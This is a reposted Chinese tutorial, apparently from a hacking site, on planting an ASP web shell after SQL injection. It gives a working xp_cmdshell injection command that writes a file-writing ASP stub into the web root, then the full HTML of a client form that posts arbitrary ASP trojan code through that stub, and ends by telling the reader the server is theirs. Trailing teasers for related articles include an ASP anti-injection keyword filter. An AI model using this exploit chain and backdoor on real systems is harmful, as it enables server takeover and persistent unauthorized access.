SQL注入与ASP木马上传

木马|上传

SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容:<%Set objFSO = Server.createObject("Scripting.FileSystemObject")Set objCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Write request("mydata")objCountFile.Close%>这个文件可以写成一行 <%Set objFSO = Server.createObject("Scripting.FileSystemObject"):Set objCountFile=objFSO.createTextFile(request("mypath"),True):objCountFile.Write request("mydata"):objCountFile.Close%>将特殊字符进行编码 就可以得到 %3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E注入(这里假定web目录是C:\Inetpub\wwwroot\): exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E" > C:\Inetpub\wwwroot\ftp.asp';这样 在服务器的web 目录下 将生成一个 ftp.asp文件该文件的代码为<%Set objFSO = Server.createObject("Scripting.FileSystemObject")Set objCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Write request("mydata")objCountFile.Close%>你可以看到,上面代码中预留了两个接口 mypath 和 mydatamypath是下次提交的时候 文件的生成路径mydata是文件的内容在本地编写一个客户端文件 例:RohuClient.htm 代码如下<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>肉鸡文件生成器--客户端 制作:绝对零度 QQ:12216796</title><style type="text/css"><!--TD {FONT-SIZE: 9pt; LINE-HEIGHT: 150%}BODY {FONT-SIZE: 12px;FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋体;SCROLLBAR-FACE-COLOR: #eeeeee; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #dee3e7; SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; SCROLLBAR-ARROW-COLOR: #006699; SCROLLBAR-TRACK-COLOR: #ededed; SCROLLBAR-DARKSHADOW-COLOR: #98aab1}A:link {FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none}A:visited {FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none}A:hover {COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline}input,select,TEXTAREA {font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋体";background-color: #f9f9f9; font-size: 9pt ; border: 1px #d2d2d2 dobble;line-height:120%;}--></style></head><script language="javascript" type="text/javascript">function chk(theform){if(theform.ftpUrl.value==''){alert('请输入递交的地址!');theform.ftpUrl.focus();return false;}if(theform.MyPath.value==''){alert('请输入生成文件的位置!');theform.MyPath.focus();return false;}if(theform.MyData.value==''){alert('请输入生成文件的内容!');theform.MyData.focus();return false;}theform.action=theform.ftpUrl.value;}</script><body><form name="RohuForm" method="post" action="" onSubmit="return chk(this)" target="_blank"><table width="673" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td width="11%">目标位置:</td><td width="79%"><input name="ftpUrl" type="text" id="ftpUrl" size="50">例:http://127.0.0.1/FTP.ASP<;/td></tr><tr><td>生成文件:</td><td><input name="MyPath" type="text" id="MyPath">将在服务器上,生成的文件路径。例:C:\Inetpub\wwwroot erver.asp </td></tr><tr><td valign="top">文件代码:</td><td><textarea name="MyData" cols="100" rows="10" id="textarea"></textarea></td></tr><tr><td> </td><td><input type="submit" name="Submit" value="提交"></td></tr></table><br></form><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td align="center">版权所有:绝对零度(<a href="http://www.rohu.com";>虎盟</a>)</td></tr></table></body></html>在目标位置栏填上刚刚生成的ftp.asp文件的url地址 如 http://127.0.0.1/ftp.asp (这里假设服务器的ip是 127.0.0.1)在生成文件栏 输入将在服务器上生成的文件名 比如:C:\Inetpub\wwwroot erver.asp 在文件内容里 ,随意的粘贴一个asp代码 点递交,当http://127.0.0.1/ftp.asp 文件执行完毕 基本上服务器上的asp木马就生成了。浏览 http://127.0.0.1/Server.ASP 呵呵 服务器就是你的了Hoky: 这篇文章前段时间不知道在那个地方看过.转贴的时候就没有写作者是谁.我也不记得了.

时间: 2024-12-03 21:54:35

SQL注入与ASP木马上传的相关文章

SQL注入天书—ASP注入漏洞全接触

SQL注入天书-ASP注入漏洞全接触选择自 digituser 的 Blog 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患.用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入. SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的

SQL注入天书 - ASP注入漏洞全接触

引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患.用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入. SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警

ASP防止SQL注入方法

  通用防SQL注入代码ASP版 代码 dim sql_injdata SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" SQL_inj = split(SQL_Injdata,"|") If Request.QueryString<>"" Then For Each SQL_Get

SQL注入攻击-来自微软安全博客的建议

本文翻译自微软博客上刊载的相关文章,英文原文版权归原作者所有,特此声明.原文:http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx近期趋势 从去年下半年开始,很多网站被损害,他们在用于生成动态网页的SQL数据库中存储的文本中被注入了恶意的HTML <script>标签.这样的攻击在2008年第一季度开始加速传播,并且持续影响有漏洞的Web程序.这些Web应用程序有这样一些共同点: 使用经典ASP代码的

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范_漏洞研究

一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html     前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074     本站转贴为: http://coolersky.com/articles/hack/analysis/prog

ASP防SQL注入攻击程序

程序|攻击|攻击   SQL注入被那些菜鸟级别的所谓黑客高手玩出了滋味,发现现在大部分黑客入侵都是基于SQL注入实现的.SQL注入被那些菜鸟级别的所谓黑客高手玩出了滋味,发现现在大部分黑客入侵都是基于SQL注入实现的,哎,谁让这个入门容易呢,好了,不说废话了,现在我开始说如果编写通用的SQL防注入程序一般的http请求不外乎get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否受到SQL注入攻击. I

ASP网页防SQL注入的代码

近日笔者的小站遭受到SQL入侵,于是上网搜索了一些相关防SQL注入的方法. 版本颇多,有人觉得这段好用,有人以为那段才行,因此综合整理了一下,包含以下几种: 以下为引用的内容:<% Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx '---定义部份 头------ Fy_Cl = 1 '处理方式:1=提示信息,2=转向页面,3=先提示再转向 Fy_Zx = "index.Asp" '出错时转向的页面 '---定义部份 尾------ O

用的ASP防SQL注入攻击程序

程序|攻击 SQL注入被那些菜鸟级别的所谓黑客高手玩出了滋味,发现现在大部分黑客入侵都是基于SQL注入实现的.SQL注入被那些菜鸟级别的所谓黑客高手玩出了滋味,发现现在大部分黑客入侵都是基于SQL注入实现的,哎,谁让这个入门容易呢,好了,不说废话了,现在我开始说如果编写通用的SQL防注入程序一般的http请求不外乎get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否受到SQL注入攻击. IIS传递给

编写通用的ASP防SQL注入攻击程序

程序|攻击 SQL注入被那些菜鸟级别的所谓黑客高手玩出了滋味,发现现在大部分黑客入侵都是基于SQL注入实现的,哎,谁让这个入门容易呢,好了,不说废话了,现在我开始说如果编写通用的SQL防注入程序一般的http请求不外乎get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否受到SQL注入攻击. IIS传递给asp.dll的get 请求是是以字符串的形式,,当 传递给Request.QueryString